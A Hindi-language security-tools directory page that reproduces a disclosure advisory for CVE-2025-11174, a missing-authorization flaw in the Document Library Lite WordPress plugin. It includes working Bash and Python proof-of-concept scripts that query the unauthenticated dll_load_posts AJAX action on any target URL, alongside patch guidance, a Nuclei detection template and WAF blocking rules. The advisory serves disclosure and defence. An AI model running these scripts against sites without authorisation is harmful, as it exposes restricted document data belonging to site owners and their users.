Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174 | Kitploit
उपकरण/GitHubGitHub/snailsploit/cve-2025-11174
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-11174: Document Library Lite WordPress प्लगइन में बिना प्रमाणीकरण के सूचना प्रकटीकरण

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

कीवर्ड: CVE-2025-11174, Document Library Lite कमजोरी, सूचना प्रकटीकरण, WordPress सुरक्षा, बिना प्रमाणीकरण का AJAX शोषण, WordPress प्लगइन कमजोरी, CWE-862, WordPress दस्तावेज़ प्लगइन सुरक्षा, प्राधिकरण बाईपास, WordPress CVE 2025

विषय सूची

  • अवलोकन
  • कमजोरी का विवरण
  • तकनीकी विश्लेषण
  • हमला वेक्टर
  • सबूत की अवधारणा
  • सुधार मार्गदर्शिका
  • पहचान
  • CVSS मीट्रिक्स
  • सन्दर्भ
  • श्रेय
  • सुरक्षा संपर्क

अवलोकन

Document Library Lite WordPress प्लगइन सूचना प्रकटीकरण कमजोरी (CVE-2025-11174) – सुरक्षा दोष जो WordPress दस्तावेज़ लाइब्रेरी प्लगइन में संवेदनशील दस्तावेज़ डेटा तक बिना प्रमाणीकरण के पहुंच की अनुमति देता है।

एक महत्वपूर्ण प्राधिकरण बाईपास कमजोरी Document Library Lite WordPress प्लगइन में खोजी गई है, जो बिना प्रमाणीकरण के हमलावरों को संवेदनशील दस्तावेज़ जानकारी तक पहुंचने की अनुमति देती है।

खोजकर्ता: Kai Aizen और Avraham Shemesh (SnailSploit)
प्रकाशित: 1 नवंबर 2025
CVSS स्कोर: 5.3 (मध्यम)
CWE: CWE-862 – अनुपस्थित प्राधिकरण
प्लगइन: Document Library Lite
विक्रेता: Barn2 Plugins
हमले का प्रकार: बिना प्रमाणीकरण के सूचना प्रकटीकरण
आवश्यक विशेषाधिकार: कोई नहीं (बिना प्रमाणीकरण का हमला)

कमजोरी का विवरण

विवरण

Document Library Lite प्लगइन (WordPress के लिए) में सभी संस्करणों तक 1.1.6 तक एक अनुचित प्राधिकरण कमजोरी है। प्लगइन एक बिना प्रमाणीकरण के AJAX एक्शन dll_load_posts को उजागर करता है जो बिना nonce या क्षमता जांच के दस्तावेज़ डेटा की JSON तालिका लौटाता है।

प्रभाव

यह कमजोरी बिना प्रमाणीकरण के हमलावरों को इसकी अनुमति देती है:

  • बिना प्राधिकरण के दस्तावेज़ मेटाडेटा तक पहुंच
  • प्रतिबंधित होने वाली दस्तावेज़ सूची प्राप्त करना
  • केवल प्रमाणित उपयोगकर्ताओं के लिए इच्छित दस्तावेज़ जानकारी देखना
  • Document Library में संग्रहीत दस्तावेज़ों की गणना करना

नोट: 5.3 का CVSS स्कोर (मध्यम गंभीरता) सीमित सूचना प्रकटीकरण को दर्शाता है। जबकि कमजोरी दस्तावेज़ डेटा तक बिना प्रमाणीकरण के पहुंच की अनुमति देती है, गोपनीयता पर प्रभाव को निम्न (Low) के रूप में रेट किया गया है, जिसका अखंडता या उपलब्धता पर कोई प्रभाव नहीं है।

प्रभावित संस्करण

  • कमजोर: सभी संस्करण ≤ 1.1.6
  • पैच किया गया: संस्करण 1.1.7 और उससे ऊपर

CVSS v3.1 मीट्रिक्स

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS v3.1 विवरण:

  • हमला वेक्टर (AV): नेटवर्क – कमजोरी का दूरस्थ रूप से नेटवर्क पर शोषण किया जा सकता है
  • हमला जटिलता (AC): निम्न – शोषण के लिए कोई विशेष शर्तें आवश्यक नहीं हैं
  • आवश्यक विशेषाधिकार (PR): कोई नहीं – कोई प्रमाणीकरण या विशेषाधिकार आवश्यक नहीं हैं
  • उपयोगकर्ता सहभागिता (UI): कोई नहीं – शोषण बिना किसी उपयोगकर्ता सहभागिता के काम करता है
  • दायरा (S): अपरिवर्तित – कमजोरी केवल कमजोर घटक को प्रभावित करती है
  • गोपनीयता प्रभाव (C): निम्न – सीमित सूचना प्रकटीकरण
  • अखंडता प्रभाव (I): कोई नहीं – कोई अखंडता प्रभाव नहीं
  • उपलब्धता प्रभाव (A): कोई नहीं – कोई उपलब्धता प्रभाव नहीं

तकनीकी विवरण

कमजोरी का मूल कारण

AJAX एक्शन dll_load_posts उचित प्रमाणीकरण या प्राधिकरण जांच के बिना पंजीकृत है:

root@kitploit:~
// कमजोर कोड पैटर्न (सरलीकृत)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');

wp_ajax_nopriv_ उपसर्ग इंगित करता है कि यह एक्शन बिना प्रमाणीकरण वाले उपयोगकर्ताओं के लिए सुलभ है, और कॉलबैक फ़ंक्शन इन्हें लागू नहीं करता है:

  • Nonce सत्यापन
  • क्षमता जांच
  • उपयोगकर्ता प्रमाणीकरण सत्यापन

हमला वेक्टर

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=dll_load_posts

कमजोरी का शोषण बिना प्रमाणीकरण के WordPress के admin-ajax.php एंडपॉइंट के माध्यम से किया जा सकता है।

सबूत की अवधारणा

⚠️ केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए

Bash PoC

root@kitploit:~
#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "उपयोग: $0 <लक्ष्य_url>"
    echo "उदाहरण: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite सूचना प्रकटीकरण PoC"
echo "[*] लक्ष्य: $TARGET_URL"
echo ""

# कमजोर AJAX एंडपॉइंट पर अनुरोध भेजें
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] यदि आप ऊपर दस्तावेज़ डेटा देखते हैं, तो साइट कमजोर है!"

Python PoC

root@kitploit:~
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite सूचना प्रकटीकरण PoC
केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] लक्ष्य: {target_url}")
    print(f"[*] AJAX एंडपॉइंट: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] अनुरोध सफल!\n")
            try:
                json_data = response.json()
                print("[+] प्राप्त दस्तावेज़ डेटा:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] साइट CVE-2025-11174 के लिए कमजोर है")
            except json.JSONDecodeError:
                print("[-] कोई JSON प्रतिक्रिया प्राप्त नहीं हुई")
                print(f"प्रतिक्रिया: {response.text[:200]}")
        else:
            print(f"[-] अनुरोध स्थिति कोड के साथ विफल: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] त्रुटि: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"उपयोग: {sys.argv[0]} <लक्ष्य_url>")
        print(f"उदाहरण: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

सुधार

साइट प्रशासकों के लिए

तत्काल कार्रवाई आवश्यक:

  1. Document Library Lite को संस्करण 1.1.7 या बाद में तुरंत अपडेट करें
  2. action=dll_load_posts के साथ admin-ajax.php पर संदिग्ध POST अनुरोधों के लिए अपनी साइट के एक्सेस लॉग की समीक्षा करें
  3. यदि आप तुरंत अपडेट नहीं कर सकते हैं, तो प्लगइन को अस्थायी रूप से अक्षम करने पर विचार करें

अपडेट निर्देश

WordPress प्रशासन के माध्यम से:

  1. WordPress प्रशासन में प्लगइन्स > स्थापित प्लगइन्स पर जाएं
  2. "Document Library Lite" ढूंढें
  3. अभी अपडेट करें पर क्लिक करें (संस्करण 1.1.7 या बाद में अपग्रेड करें)
  4. सुनिश्चित करें कि अपडेट सफल रहा

WP-CLI का उपयोग करके:

root@kitploit:~
wp plugin update document-library-lite

प्लगइन डेवलपर्स के लिए

सुनिश्चित करें कि सभी AJAX हैंडलर उचित सुरक्षा नियंत्रण लागू करें:

root@kitploit:~
// उचित AJAX सुरक्षा का उदाहरण
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');

function dll_load_posts_callback() {
    // Nonce सत्यापित करें
    if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
        wp_die('अमान्य nonce');
    }
    
    // क्षमताओं की जांच करें
    if (!current_user_can('read')) {
        wp_send_json_error('अपर्याप्त अनुमतियाँ');
        wp_die();
    }
    
    // आपका सुरक्षित कोड यहाँ
}

पहचान

WordPress प्लगइन जांच

root@kitploit:~
# जांचें कि कमजोर संस्करण स्थापित है या नहीं
wp plugin list | grep -i "document-library-lite"

सुरक्षा स्कैनर नियम

न्यूक्लियाई टेम्पलेट:

root@kitploit:~
id: CVE-2025-11174

info:
  name: Document Library Lite - बिना प्रमाणीकरण के सूचना प्रकटीकरण
  author: security-research
  severity: medium
  description: WordPress के लिए Document Library Lite प्लगइन सूचना प्रकटीकरण के लिए कमजोर है
  reference:
    - https://github.com/[your-repo]/CVE-2025-11174
  tags: cve,cve2025,wordpress,wp-plugin,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    
    body: "action=dll_load_posts"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "data"
          - "recordsTotal"
        condition: and
      
      - type: status
        status:
          - 200

वेब एप्लिकेशन फ़ायरवॉल नियम

ModSecurity नियम:

root@kitploit:~
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
    "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
    log,deny,status:403,msg:'CVE-2025-11174 शोषण प्रयास'"
    SecRule ARGS:action "@streq dll_load_posts" "t:none"

Nginx/OpenResty नियम:

root@kitploit:~
if ($request_uri ~* "admin-ajax\.php") {
    if ($args ~* "action=dll_load_posts") {
        return 403;
    }
}

समयरेखा

  • 1 नवंबर 2025 - कमजोरी सार्वजनिक रूप से प्रकट हुई
  • 1 नवंबर 2025 - CVE रिकॉर्ड प्रकाशित
  • नवंबर 2025 - पैच जारी किया गया (संस्करण 1.1.7)

सन्दर्भ

  • CVE-2025-11174 - CVE.org
  • GitHub सलाहकार डेटाबेस
  • Wordfence इंटेलिजेंस
  • WordPress प्लगइन निर्देशिका

श्रेय

शोधकर्ता:

  • Avraham Shemesh
  • Kai Aizen - SnailSploit

प्रकटीकरण प्रक्रिया: समन्वित प्रकटीकरण

अस्वीकरण

यह जानकारी केवल सुरक्षा अनुसंधान और रक्षात्मक उद्देश्यों के लिए प्रदान की गई है। इस कमजोरी का दुर्भावनापूर्ण उद्देश्यों के लिए कोई भी शोषण अवैध और अनैतिक है। उन प्रणालियों का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें जिनके आप मालिक नहीं हैं।

संपर्क

इस कमजोरी के बारे में प्रश्नों या अतिरिक्त जानकारी के लिए:

  • ईमेल: [email protected]
  • वेबसाइट: snailsploit.com
  • संगठन: SnailSploit सुरक्षा अनुसंधान

अंतिम अद्यतन: 2 नवंबर 2025


📚 दस्तावेज़ीकरण और लेखक

इस परियोजना का पूरा लेख, कार्यप्रणाली और संबंधित शोध यहां रहता है:

https://snailsploit.com/security-research/cves/cve-2025-11174/

Kai Aizen द्वारा निर्मित — स्वतंत्र आक्रामक सुरक्षा शोधकर्ता।

snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

वही हमला। अलग सब्सट्रेट।

टूल डाउनलोड करें
मीट्रिकमान
हमला वेक्टरनेटवर्क (AV:N)
हमला जटिलतानिम्न (AC:L)
आवश्यक विशेषाधिकारकोई नहीं (PR:N)
उपयोगकर्ता सहभागिताकोई नहीं (UI:N)
दायराअपरिवर्तित (S:U)
गोपनीयतानिम्न (C:L)
अखंडताकोई नहीं (I:N)
उपलब्धताकोई नहीं (A:N)